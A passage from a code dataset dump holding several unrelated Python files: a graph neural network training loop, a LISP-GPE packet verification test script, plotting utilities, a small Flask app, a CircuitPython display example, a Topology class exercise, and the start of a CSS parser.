weight_decay=train_wtdecay)\n\n\n #### Logging the details \n logging.info(\"Model Architecture Used {}.\".format(model_type)) \n logging.info(str(model))\n tot_params = sum([np.prod(p.size()) for p in model.parameters()])\n logging.info(f\"Total number of parameters: {tot_params}\")\n logging.info(f\"Number of epochs: {train_epochs}\")\n\n if device.type == 'cuda':\n model.cuda()\n features = features.cuda()\n adj = adj.cuda()\n labels = labels.cuda()\n idx_train = idx_train.cuda()\n idx_val = idx_val.cuda()\n idx_test = idx_test.cuda()\n\n train_loss_history = []\n val_loss_history = []\n train_acc_history = []\n val_acc_history = []\n bad_counter = 0\n loss_best = np.inf\n loss_mn = np.inf\n acc_best = 0.0\n acc_mx = 0.0\n best_epoch = 0\n\n # Train model\n t_total = time.time()\n logging.info(\"\\n[STEP 3]: Model {} Training for epochs {}.\".format(model_type,train_epochs))\n \n for epoch in range(train_epochs):\n to= time.time()\n train_loss,train_acc,val_loss,val_acc =train(model, optimizer, features, adj, labels, idx_train,idx_val,epoch,sample,\\\n dropnode_rate,orderr, temp , lam,edges,valmode= train_valmode)\n \n print('Epoch: {:04d}'.format(epoch+1),'loss_train: {:.4f}'.format(train_loss),'acc_train: {:.4f}'.format(train_acc),'loss_val: {:.4f}'.format(val_loss),\\\n 'acc_val: {:.4f}'.format(val_acc),'time: {:.4f}s'.format(time.time() - to))\n logging.info(\"Epoch:{:04d} loss_train:{:.4f} acc_train:{:.4f} loss_val:{:.4f} acc_val:{:.4f} time:{:.4f}s.\".format((epoch+1),\\\n (train_loss),(train_acc),(val_loss),(val_acc),(time.time()-to)))\n\n train_loss_history.append(train_loss)\n train_acc_history.append(train_acc)\n val_loss_history.append(val_loss)\n val_acc_history.append(val_acc) \n \n path = os.path.join(train_modelsave, '{}_{}.pkl'.format(model_type, epoch)) \n if val_loss_history[-1] <= loss_mn or val_acc_history[-1] >= acc_mx:\n if val_loss_history[-1] <= loss_best:\n loss_best = val_loss_history[-1]\n acc_best = val_acc_history[-1]\n best_epoch = epoch\n torch.save(model.state_dict(), path)\n\n loss_mn = np.min((val_loss_history[-1], loss_mn))\n acc_mx = np.max((val_acc_history[-1], acc_mx))\n bad_counter = 0\n else:\n bad_counter += 1\n\n if bad_counter == train_patience:\n print('Early stop! Min loss: ', loss_mn, ', Max accuracy: ', acc_mx)\n print('Early stop model validation loss: ', loss_best, ', accuracy: ', acc_best)\n train_epochs=epoch+1\n break\n\n for f in glob.glob(os.path.join(train_modelsave,'*.pkl')):\n epoch_nb = int(f.split(os.path.sep)[-1].split('_')[-1].split('.')[0])\n if epoch_nb < best_epoch:\n os.remove(f)\n\n print(\"Total time elapsed: {:.4f}s\".format(time.time() - t_total))\n logging.info(f\"Total Training Completed :{(time.time() - t_total)}\")\n\n for f in glob.glob(os.path.join(train_modelsave,'*.pkl')):\n epoch_nb =int(f.split(os.path.sep)[-1].split('_')[-1].split('.')[0])\n if epoch_nb > best_epoch:\n os.remove(f)\n\n if train_savefig: \n logging.info(\"\\n[STEP 3a]: Saving the Plot of Model {} Training(loss/acc)vs Validation(loss/acc).\".format(model_type))\n\n (save_dir / 'train_plot' if train_savefig else save_dir).mkdir(parents=True, exist_ok=True)\n save_path = str(save_dir / 'train_plot') \n num_epochs = range(1, train_epochs + 1)\n plot_train_val_loss(num_epochs,train_loss_history,val_loss_history,save_path)\n plot_train_val_acc(num_epochs,train_acc_history,val_acc_history,save_path)\n\n ############################################## Training Completed ##############\n ############################################## Testing Started\n print('Loading {}th epoch'.format(best_epoch))\n\n #### Loading the model with same saved format \n loadpath = os.path.join(train_modelsave, '{}_{}.pkl'.format(model_type, best_epoch)) \n model.load_state_dict(torch.load(loadpath))\n \n if test_outputviz: \n (save_dir / 'test_fig' if test_outputviz else save_dir).mkdir(parents=True, exist_ok=True)\n testsave_fig = str(save_dir / 'test_fig')\n\n logging.info(\"\\n[STEP 4]: Testing {} final model.\".format(model_type))\n\n test(model, features,adj,edges, idx_test,labels,test_outputviz,\\\n data_type,dropnode_rate,orderr,testsave_fig)\n\nif __name__ == \"__main__\":\n main()\n torch.cuda.empty_cache()\n","sub_path":"Grand_DropEdge/train_granddropedge.py","file_name":"train_granddropedge.py","file_ext":"py","file_size_in_byte":16280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"275322119","text":"#!/usr/bin/env python3\n\n# Copyright (c) 2021 Cisco and/or its affiliates.\n#\n# SPDX-License-Identifier: Apache-2.0 OR GPL-2.0-or-later\n#\n# Licensed under the Apache License 2.0 or\n# GNU General Public License v2.0 or later; you may not use this file\n# except in compliance with one of these Licenses. You\n# may obtain a copy of the Licenses at:\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n# https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html\n#\n# Note: If this file is linked with Scapy, which is GPLv2+, your use of it\n# must be under GPLv2+. If at any point in the future it is no longer linked\n# with Scapy (or other GPLv2+ licensed software), you are free to choose\n# Apache 2.\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Traffic script that sends an ICMP/ICMPv6 packet out one interface, receives\na LISPGPE-encapsulated packet on the other interface and verifies received\npacket.\n\"\"\"\n\nimport sys\n\nfrom scapy.all import bind_layers, Packet\nfrom scapy.fields import FlagsField, BitField, XBitField, IntField\nfrom scapy.layers.inet import ICMP, IP, UDP\nfrom scapy.layers.inet6 import ICMPv6EchoRequest\nfrom scapy.layers.inet6 import IPv6, ICMPv6ND_NS, ICMPv6MLReport2, ICMPv6ND_RA\nfrom scapy.layers.l2 import Ether\nfrom scapy.packet import Raw\n\nfrom ..PacketVerifier import RxQueue, TxQueue\nfrom ..TrafficScriptArg import TrafficScriptArg\nfrom ..ValidIp import valid_ipv4, valid_ipv6\n\n\nclass LispGPEHeader(Packet):\n \"\"\"Scapy header for the Lisp GPE Layer.\"\"\"\n\n name = \"Lisp GPE Header\"\n fields_desc = [\n FlagsField(\n u\"flags\", None, 8, [u\"N\", u\"L\", u\"E\", u\"V\", u\"I\", u\"P\", u\"R\", u\"O\"]\n ),\n BitField(u\"version\", 0, size=2),\n BitField(u\"reserved\", 0, size=14),\n XBitField(u\"next_protocol\", 0, size=8),\n IntField(u\"instance_id/locator_status_bits\", 0)\n ]\n\n def guess_payload_class(self, payload):\n protocol = {\n 0x1: LispGPEInnerIP,\n 0x2: LispGPEInnerIPv6,\n 0x3: LispGPEInnerEther,\n 0x4: LispGPEInnerNSH\n }\n return protocol[self.next_protocol]\n\n\nclass LispGPEInnerIP(IP):\n \"\"\"Scapy inner LISP GPE layer for IPv4-in-IPv4.\"\"\"\n\n name = u\"Lisp GPE Inner Layer - IPv4\"\n\n\nclass LispGPEInnerIPv6(IPv6):\n \"\"\"Scapy inner LISP GPE layer for IPv6-in-IPv6.\"\"\"\n\n name = u\"Lisp GPE Inner Layer - IPv6\"\n\n\nclass LispGPEInnerEther(Ether):\n \"\"\"Scapy inner LISP GPE layer for Lisp-L2.\"\"\"\n\n name = u\"Lisp GPE Inner Layer - Ethernet\"\n\n\nclass LispGPEInnerNSH(Packet):\n \"\"\"Scapy inner LISP GPE layer for Lisp-NSH.\n\n Parsing not implemented.\n \"\"\"\n\n\ndef main():\n \"\"\"Send IP ICMP packet from one traffic generator interface to the other.\n\n :raises RuntimeError: If the received packet is not correct.\"\"\"\n\n args = TrafficScriptArg(\n [\n u\"tg_src_mac\", u\"tg_dst_mac\", u\"src_ip\", u\"dst_ip\", u\"dut_if1_mac\",\n u\"dut_if2_mac\", u\"src_rloc\", u\"dst_rloc\"\n ],\n [u\"ot_mode\"]\n )\n\n tx_src_mac = args.get_arg(u\"tg_src_mac\")\n tx_dst_mac = args.get_arg(u\"dut_if1_mac\")\n rx_dst_mac = args.get_arg(u\"tg_dst_mac\")\n rx_src_mac = args.get_arg(u\"dut_if2_mac\")\n src_ip = args.get_arg(u\"src_ip\")\n dst_ip = args.get_arg(u\"dst_ip\")\n src_rloc = args.get_arg(u\"src_rloc\")\n dst_rloc = args.get_arg(u\"dst_rloc\")\n tx_if = args.get_arg(u\"tx_if\")\n rx_if = args.get_arg(u\"rx_if\")\n ot_mode = args.get_arg(u\"ot_mode\")\n\n rxq = RxQueue(rx_if)\n txq = TxQueue(tx_if)\n\n pkt_raw = Ether(src=tx_src_mac, dst=tx_dst_mac)\n\n if valid_ipv4(src_ip) and valid_ipv4(dst_ip):\n pkt_raw /= IP(src=src_ip, dst=dst_ip)\n pkt_raw /= ICMP()\n ip_format = IP\n elif valid_ipv6(src_ip) and valid_ipv6(dst_ip):\n pkt_raw /= IPv6(src=src_ip, dst=dst_ip)\n pkt_raw /= ICMPv6EchoRequest()\n ip_format = IPv6\n else:\n raise ValueError(u\"IP not in correct format\")\n\n bind_layers(UDP, LispGPEHeader, dport=4341)\n\n pkt_raw /= Raw()\n sent_packets = list()\n sent_packets.append(pkt_raw)\n txq.send(pkt_raw)\n\n while True:\n if tx_if == rx_if:\n ether = rxq.recv(2, ignore=sent_packets)\n else:\n ether = rxq.recv(2)\n\n if ether is None:\n raise RuntimeError(u\"ICMP echo Rx timeout\")\n\n if ether.haslayer(ICMPv6ND_NS):\n # read another packet in the queue if the current one is ICMPv6ND_NS\n continue\n if ether.haslayer(ICMPv6ND_RA):\n # read another packet in the queue if the current one is ICMPv6ND_RA\n continue\n elif ether.haslayer(ICMPv6MLReport2):\n # read another packet in the queue if the current one is\n # ICMPv6MLReport2\n continue\n\n # otherwise process the current packet\n break\n\n if rx_dst_mac == ether[Ether].dst and rx_src_mac == ether[Ether].src:\n print(u\"MAC addresses match.\")\n else:\n raise RuntimeError(f\"Matching packet unsuccessful: {ether!r}\")\n\n ip = ether.payload\n\n if ot_mode == u\"6to4\":\n if not isinstance(ip, IP):\n raise RuntimeError(f\"Not an IP packet received {ip!r}\")\n elif ot_mode == u\"4to6\":\n if not isinstance(ip, IPv6):\n raise RuntimeError(f\"Not an IP packet received {ip!r}\")\n elif not isinstance(ip, ip_format):\n raise RuntimeError(f\"Not an IP packet received {ip!r}\")\n\n lisp = ether.getlayer(LispGPEHeader).underlayer\n if not lisp:\n raise RuntimeError(u\"Lisp layer not present or parsing failed.\")\n\n # Compare data from packets\n if src_ip == lisp.src:\n print(u\"Source IP matches source EID.\")\n else:\n raise RuntimeError(\n f\"Matching Src IP unsuccessful: {src_ip} != {lisp.src}\"\n )\n\n if dst_ip == lisp.dst:\n print(u\"Destination IP matches destination EID.\")\n else:\n raise RuntimeError(\n f\"Matching Dst IP unsuccessful: {dst_ip} != {lisp.dst}\"\n )\n\n if src_rloc == ip.src:\n print(u\"Source RLOC matches configuration.\")\n else:\n raise RuntimeError(\n f\"Matching Src RLOC unsuccessful: {src_rloc} != {ip.src}\"\n )\n\n if dst_rloc == ip.dst:\n print(u\"Destination RLOC matches configuration.\")\n else:\n raise RuntimeError(\n f\"Matching dst RLOC unsuccessful: {dst_rloc} != {ip.dst}\"\n )\n\n sys.exit(0)\n\n\nif __name__ == u\"__main__\":\n main()\n","sub_path":"GPL/traffic_scripts/lisp/lispgpe_check.py","file_name":"lispgpe_check.py","file_ext":"py","file_size_in_byte":6693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"286165593","text":"import matplotlib.patches as patches\nimport matplotlib.pyplot as plt\nimport time\n\nimport numpy as np\nfrom matplotlib.legend import Legend\n\nsendMsgId = 0\npointCnt = 5\nmaxPoint = 10\ncol = ['bo', 'ro', 'go', 'co', 'mo', 'yo', 'ko', 'wo']\nclass TagData:\n _idx = 0\n def __init__(self, tagId):\n self.locs = []\n self.idx = TagData._idx\n self.id = tagId\n self.leftCnt = 100\n self.col = col[self.idx % len(col)]\n TagData._idx += 1\n\n def update(self, loc):\n self.locs.insert(0, loc)\n if len(self.locs) > maxPoint:\n self.locs.pop()\n\n def std(self):\n a = np.array(self.locs)\n return np.std(a, axis=0)\n\nclass TagDataDict(dict):\n\n def getTagData(self, tagId):\n if tagId in self:\n ret = self[tagId]\n ret.leftCnt -= 1\n # if ret.leftCnt <= 0:\n # del self[tagId]\n return ret\n ret = TagData(tagId)\n self[tagId] = ret\n return ret\n\n def clear(self):\n toDel = filter(lambda k: self[k].leftCnt <= 0, self.keys())\n for k in toDel:\n del self[k]\n\nclass LocFig:\n def __init__(self, plt, tagDatas):\n self.plt = plt\n self.plt.close()\n self.plt.ion()\n self.fig = plt.figure()\n self.bgax = self.fig.add_subplot(1,1,1)\n self.tagDatas = tagDatas\n self.xyFormat = '{0:.2f}'\n\n def draw(self):\n self.bgax.clear()\n self.bgax.grid(True)\n self.bgax.axis(\"equal\")\n self.bgax.axis([-25, 25, -20, 20])\n self.bgax.add_patch(patches.Rectangle((-0.147, -0.179), 0.294, 0.358))\n for tagId in self.tagDatas:\n tagData = self.tagDatas.getTagData(tagId)\n x = list(map(lambda xy: xy[0], tagData.locs[-pointCnt:]))\n y = list(map(lambda xy: xy[1], tagData.locs[-pointCnt:]))\n label = tagData.std()\n label = list(map(lambda x: str(self.xyFormat.format(x)), label))\n self.bgax.plot(x, y, tagData.col, alpha = 0.7, label=str(tagId)+\" [\"+ ' '.join(label) + \"]\")\n self.bgax.text(x[0]+0.2,y[0]+0.2,[self.xyFormat.format(x[0]), self.xyFormat.format(y[0])])\n #self.bgax.legend()\n self.plt.pause(0.01)\n\nclass DisplayLoc:\n\n tagDatas = TagDataDict()\n fig = False\n def get_fig(self):\n if not self.fig:\n self.fig = LocFig(plt, self.tagDatas)\n return self.fig\n\n def display_forever(self, interval = 0.2):\n self.get_fig()\n while True:\n self.display_once()\n time.sleep(interval)\n\n def display_once(self):\n self.get_fig()\n self.fig.draw()\n self.fig.plt.pause(0.01)\n\n def update(self, tagId, xyz):\n self.tagDatas.getTagData(tagId).update(xyz)\n\nclass PhaseFig:\n def __init__(self):\n self.plt = plt\n self.plt.close()\n self.plt.ion()\n self.fig = plt.figure()\n self.plots = []\n self.format = '{0:.2f}'\n for i in range(1, 5):\n subp = self.fig.add_subplot(2, 2, i)\n # legend = Legend(padding=10, align=\"ur\")\n # legend.plots = subp\n # subp.overlays.append(legend)\n self.plots.append(self.fig.add_subplot(2, 2, i))\n\n\n def to_180_180(self, phase):\n while phase > 180:\n phase -= 360\n while phase <= -180:\n phase += 360\n return phase\n\n his_stds = [[], [], []]\n def draw(self, datas, fixes):\n if len(datas) < 3 or len(fixes) < 3:\n return\n\n tmps = []\n stds = []\n ave_stds = []\n for i in range(len(datas)):\n tmp = list(map(lambda x: self.to_180_180(x + fixes[i]), datas[i]))\n std = np.std(tmp, ddof=1)\n stds.append(std)\n tmps.append(tmp)\n\n for j in range(3):\n self.his_stds[j].append(stds[j])\n if len(self.his_stds[j]) > 10:\n self.his_stds[j].pop(0)\n ave_stds.append(np.std(self.his_stds[j], ddof=1))\n\n for i in range(3):\n plot = self.plots[i]\n plot.clear()\n data = tmps[i]\n plot.plot(range(len(data)), data, 'o')\n self.plots[3].clear()\n self.plots[3].text(0.1, 0.8, [\"stds:\"])\n self.plots[3].text(0.2, 0.7, list(map(self.format.format, stds)))\n self.plots[3].text(0.1, 0.6, [\"stds of stds:\"])\n self.plots[3].text(0.2, 0.5, list(map(self.format.format, ave_stds)))\n self.plots[3].text(0.1, 0.2, [\"fixes\", fixes])\n self.plt.pause(0.01)\n\n\nif __name__ == '__main__':\n print(\"test display\")\n display = DisplayLoc()\n for i in range(1000):\n display.update(123, [i, i, i])\n display.display_once()\n time.sleep(0.5)\n\n","sub_path":"display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":4763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"401838066","text":"import os\nfrom flask import Flask, render_template\napp = Flask(__name__, static_folder='static')\n\n@app.route('/', methods=['GET'])\ndef index_page_landing():\n video_name = os.listdir('./res/frontend/static/emotion')\n print (video_name)\n return render_template('index.html', video_name=video_name)\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=2000)","sub_path":"res/frontend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"379515302","text":"import displayio\nfrom os import uname\nif uname()[0] == 'samd51':\n import board\nelse:\n from blinka_displayio_pygamedisplay import PyGameDisplay\nfrom adafruit_display_text import label\nfrom adafruit_bitmap_font import bitmap_font\n\nif uname()[0] == 'samd51':\n display= board.DISPLAY\nelse:\n display = PyGameDisplay(width=320, height=240)\nmain_group = displayio.Group(max_size=100)\nfont_name = \"fonts/LibreBodoniv2002-Bold-10.bdf\"\nMEDIUM_FONT = bitmap_font.load_font(\"fonts/LibreBodoniv2002-Bold-10.bdf\")\nBIG_FONT = bitmap_font.load_font(\"fonts/LibreBodoniv2002-Bold-27.bdf\")\nTIME_PAUSE = 2\n\nbitmap = displayio.Bitmap(4, 320, 2)\npalette = displayio.Palette(2)\npalette[0] = 0x004400\npalette[1] = 0x00FFFF\nhorizontal_line = displayio.TileGrid(bitmap,\n pixel_shader=palette,\n x=155,\n y=0)\nmain_group.append(horizontal_line)\n\nbitmap = displayio.Bitmap(320, 4, 2)\nvertica_line = displayio.TileGrid(bitmap,\n pixel_shader=palette,\n x=0,\n y=110)\nmain_group.append(vertica_line)\n\ntext_initial_specs = label.Label(MEDIUM_FONT,\n text=\"CircuitPython\",\n x=display.width // 2,\n y=display.height // 2,\n padding_right=10,\n padding_top=10,\n padding_bottom=10,\n padding_left=10,\n anchored_position=(display.width // 2, display.height // 2),\n anchor_point=(0.5, 0.5),\n theme=\"MAGTAG\",\n )\nmain_group.append(text_initial_specs)\n\n\ntext_initial_specs2 = label.Label(MEDIUM_FONT,\n text=\"CircuitPython\",\n x=display.width // 2,\n y=display.height // 2,\n color=0x44FF44,\n background_color=990099,\n padding_right=10,\n padding_top=10,\n padding_bottom=10,\n padding_left=10,\n anchored_position=(display.width // 2, (display.height // 2)+30),\n anchor_point=(0.5, 0.5),\n )\nmain_group.append(text_initial_specs2)\ndisplay.show(main_group)\n\nwhile True:\n pass","sub_path":"example_label_themed.py","file_name":"example_label_themed.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"500990347","text":"# -*- coding: utf-8 -*-\n\n'''\nЗадание 26.1a\n\nВ этом задании надо сделать так, чтобы экземпляры класса Topology были итерируемыми объектами.\nОснову класса Topology можно взять из любого задания 25.1x или задания 26.1.\n\nПосле создания экземпляра класса, экземпляр должен работать как итерируемый объект.\nНа каждой итерации должен возвращаться кортеж, который описывает одно соединение.\nПорядок вывода соединений может быть любым.\n\n\nПример работы класса:\n\nIn [1]: top = Topology(topology_example)\n\nIn [2]: for link in top:\n ...: print(link)\n ...:\n(('R1', 'Eth0/0'), ('SW1', 'Eth0/1'))\n(('R2', 'Eth0/0'), ('SW1', 'Eth0/2'))\n(('R2', 'Eth0/1'), ('SW2', 'Eth0/11'))\n(('R3', 'Eth0/0'), ('SW1', 'Eth0/3'))\n(('R3', 'Eth0/1'), ('R4', 'Eth0/0'))\n(('R3', 'Eth0/2'), ('R5', 'Eth0/0'))\n\n\nПроверить работу класса.\n'''\nclass Topology:\n def __init__(self, top):\n self.res = {}\n for key,value in top.items():\n if value not in self.res.keys():\n self.res[key] = value\n self.topology = self.res\n\n def __add__(self, other):\n out = self.res.copy()\n out.update(other.res)\n output = Topology(out)\n return output\n\n def getitem(self, index):\n print('Вызываю __getitem__')\n return self.res.items()\n\n def __iter__(self):\n print('Вызываю __iter__')\n return iter(self.res.items())\n\ntopology_example = {('R1', 'Eth0/0'): ('SW1', 'Eth0/1'),\n ('R2', 'Eth0/0'): ('SW1', 'Eth0/2'),\n ('R2', 'Eth0/1'): ('SW2', 'Eth0/11'),\n ('R3', 'Eth0/0'): ('SW1', 'Eth0/3'),\n ('R3', 'Eth0/1'): ('R4', 'Eth0/0'),\n ('R3', 'Eth0/2'): ('R5', 'Eth0/0'),\n ('SW1', 'Eth0/1'): ('R1', 'Eth0/0'),\n ('SW1', 'Eth0/2'): ('R2', 'Eth0/0'),\n ('SW1', 'Eth0/3'): ('R3', 'Eth0/0')}\n\n\n","sub_path":"exercises/26_oop_special_methods/task_26_1a.py","file_name":"task_26_1a.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"243420290","text":"# -*- coding: utf-8 -*-\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# ~ Copyright (C) 2002-2004 TechGame Networks, LLC.\n# ~\n# ~ This library is free software; you can redistribute it and/or\n# ~ modify it under the terms of the BSD style License as found in the\n# ~ LICENSE file included with this distribution.\n#\n# Modified by Dirk Holtwick , 2007-2008\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\"\"\"\nCSS-2.1 parser\n~~~~~~~~~~~~~~\n\nThe CSS 2.1 Specification this parser was derived from can be found at http://www.w3.org/TR/CSS21/\n\nPrimary Classes:\n * CSSParser\n Parses CSS source forms into results using a Builder Pattern. Must\n provide concrete implementation of CSSBuilderAbstract.\n\n * CSSBuilderAbstract\n Outlines the interface between CSSParser and it's rule-builder.\n Compose CSSParser with a concrete implementation of the builder to get\n usable results from the CSS parser.\n\nDependencies:\n python 2.3 (or greater)\n re\n\"\"\"\n\nimport re\nimport six\n\nfrom xhtml2pdf.w3c.cssSpecial import cleanup_css\n\n\ndef is_at_rule_ident(src, ident):\n \"\"\"\n\n :param src:\n :param ident:\n :return:\n \"\"\"\n return re.match(r'^@' + ident + r'\\s*', src)\n\n\ndef strip_at_rule_ident(src):\n \"\"\"\n\n :param src:\n :return:\n \"\"\"\n return re.sub(r'^@[a-z\\-]+\\s*', '', src)\n\n\nclass CSSSelectorAbstract(object):\n \"\"\"Outlines the interface between CSSParser and it's rule-builder for selectors.\n\n CSSBuilderAbstract.selector and CSSBuilderAbstract.combineSelectors must\n return concrete implementations of this abstract.\n\n See css.CSSMutableSelector for an example implementation.\n \"\"\"\n def add_hash_id(self, hashId):\n raise NotImplementedError('Subclass responsibility')\n\n def add_class(self, class_):\n raise NotImplementedError('Subclass responsibility')\n\n def add_attribute(self, attrName):\n raise NotImplementedError('Subclass responsibility')\n\n def add_attribute_operation(self, attrName, op, attrValue):\n raise NotImplementedError('Subclass responsibility')\n\n def add_pseudo(self, name):\n raise NotImplementedError('Subclass responsibility')\n\n def add_pseudo_function(self, name, value):\n raise NotImplementedError('Subclass responsibility')\n\n\nclass CSSBuilderAbstract(object):\n \"\"\"\n Outlines the interface between CSSParser and it's rule-builder. Compose\n CSSParser with a concrete implementation of the builder to get usable\n results from the CSS parser.\n\n See css.CSSBuilder for an example implementation\n \"\"\"\n def set_charset(self, charset):\n raise NotImplementedError('Subclass responsibility')\n\n # ~ css results ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n def begin_stylesheet(self):\n raise NotImplementedError('Subclass responsibility')\n\n def stylesheet(self, elements):\n raise NotImplementedError('Subclass responsibility')\n\n def end_stylesheet(self):\n raise NotImplementedError('Subclass responsibility')\n\n def begin_inline(self):\n raise NotImplementedError('Subclass responsibility')\n\n def inline(self, declarations):\n raise NotImplementedError('Subclass responsibility')\n\n def end_inline(self):\n raise NotImplementedError('Subclass responsibility')\n\n def ruleset(self, selectors, declarations):\n raise NotImplementedError('Subclass responsibility')\n\n # ~ css namespaces ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n def resolve_namespace_prefix(self, nsPrefix, name):\n raise NotImplementedError('Subclass responsibility')\n\n # ~ css @ directives ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n def at_charset(self, charset):\n raise NotImplementedError('Subclass responsibility')\n\n def at_import(self, import_, mediums, cssParser):\n raise NotImplementedError('Subclass responsibility')\n\n def at_namespace(self, nsPrefix, uri):\n raise NotImplementedError('Subclass responsibility')\n\n def at_media(self, mediums, ruleset):\n raise NotImplementedError('Subclass responsibility')\n\n def at_page(self, page, pseudopage, declarations):\n raise NotImplementedError('Subclass responsibility')\n\n def at_font_face(self, declarations):\n raise NotImplementedError('Subclass responsibility')\n\n def at_ident(self, atIdent, cssParser, src):\n return src, NotImplemented\n\n # ~ css selectors ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n def combine_selectors(self, selectorA, combiner, selectorB):\n \"\"\"Return value must implement CSSSelectorAbstract\"\"\"\n raise NotImplementedError('Subclass responsibility')\n\n def selector(self, name):\n \"\"\"Return value must implement CSSSelectorAbstract\"\"\"\n raise NotImplementedError('Subclass responsibility')\n\n # ~ css declarations ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n def property(self, name, value, important=False):\n raise NotImplementedError('Subclass responsibility')\n\n def combine_terms(self, termA, combiner, termB):\n raise NotImplementedError('Subclass responsibility')\n\n def term_ident(self, value):\n raise NotImplementedError('Subclass responsibility')\n\n def term_number(self, value, units=None):\n raise NotImplementedError('Subclass responsibility')\n\n def term_rgb(self, value):\n raise NotImplementedError('Subclass responsibility')\n\n def term_uri(self, value):\n raise NotImplementedError('Subclass responsibility')\n\n def term_string(self, value):\n raise NotImplementedError('Subclass responsibility')\n\n def term_unicode_range(self, value):\n raise NotImplementedError('Subclass responsibility')\n\n def term_function(self, name, value):\n raise NotImplementedError('Subclass responsibility')\n\n def term_unknown(self, src):\n raise NotImplementedError('Subclass responsibility')\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# ~ CSS Parser\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nclass CSSParseError(Exception):\n src = None\n ctxsrc = None\n fullsrc = None\n inline = False\n srcCtxIdx = None\n srcFullIdx = None\n ctxsrcFullIdx = None\n\n def __init__(self, msg, src, ctxsrc=None):\n super(Exception, self).__init__(msg)\n self.src = src\n self.ctxsrc = ctxsrc or src\n if self.ctxsrc:\n self.srcCtxIdx = self.ctxsrc.find(self.src)\n if self.srcCtxIdx < 0:\n del self.srcCtxIdx\n\n def __str__(self):\n if self.ctxsrc:\n return \"{0}:: ({1}, {2})\".format(super(Exception, self).__str__(),\n repr(self.ctxsrc[:self.srcCtxIdx]),\n repr(self.ctxsrc[self.srcCtxIdx:self.srcCtxIdx + 20]))\n else:\n return \"{0}:: {1}\".format(super(Exception, self).__str__(), repr(self.src[:40]))\n\n def setFullCSSSource(self, fullsrc, inline=False):\n self.fullsrc = fullsrc\n if inline:\n self.inline = inline\n if self.fullsrc:\n self.srcFullIdx = self.fullsrc.find(self.src)\n if self.srcFullIdx < 0:\n del self.srcFullIdx\n self.ctxsrcFullIdx = self.fullsrc.find(self.ctxsrc)\n if self.ctxsrcFullIdx < 0:\n del self.ctxsrcFullIdx\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nclass CSSParser(object):\n \"\"\"\n CSS-2.1 parser dependent only upon the re module.\n\n Implemented directly from http://www.w3.org/TR/CSS21/grammar.html\n Tested with some existing CSS stylesheets for portability.\n\n CSS Parsing API:\n * setCSSBuilder()\n To set your concrete implementation of CSSBuilderAbstract\n\n * parseFile()\n Use to parse external stylesheets using a file-like object::\n\n >>> cssFile = open('test.css', 'r')\n >>> stylesheets = myCSSParser.parse_file(cssFile)\n\n * parse()\n Use to parse embedded stylesheets using source string::\n\n >>> cssSrc = '''\n body,body.body {\n font: 110%, \"Times New Roman\", Arial, Verdana, Helvetica, serif;\n background: White;\n color: Black;\n }\n a {text-decoration: underline;}\n '''\n >>> stylesheets = myCSSParser.parse(cssSrc)\n\n * parseInline()\n Use to parse inline stylesheets using attribute source string::\n\n >>> style = 'font: 110%, \"Times New Roman\", Arial, Verdana, Helvetica, serif; background: White; color: Black'\n >>> stylesheets = myCSSParser.parse_inline(style)\n\n * parseAttributes()\n Use to parse attribute string values into inline stylesheets::\n\n >>> stylesheets = myCSSParser.parse_attributes(\n font='110%, \"Times New Roman\", Arial, Verdana, Helvetica, serif',\n background='White',\n color='Black')\n\n * parseSingleAttr()\n Use to parse a single string value into a CSS expression::\n\n >>> fontValue = myCSSParser.parse_single_attr('110%, \"Times New Roman\", Arial, Verdana, Helvetica, serif')\n \"\"\"\n\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # ~ Constants / Variables / Etc.\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n ParseError = CSSParseError\n\n attribute_operators = ['=', '~=', '|=', '&=', '^=', '!=', '<>']\n selector_qualifiers = ('#', '.', '[', ':')\n selector_combiners = ['+', '>']\n expression_operators = ('/', '+', ',')\n\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # ~ Regular expressions\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n _orRule = lambda *args: '|'.join(args)\n _reflags = re.I | re.M | re.U\n i_hex = '[0-9a-fA-F]'\n i_nonascii = u'[\\200-\\377]'\n i_unicode = '\\\\\\\\(?:%s){1,6}\\s?' % i_hex\n i_escape = _orRule(i_unicode, 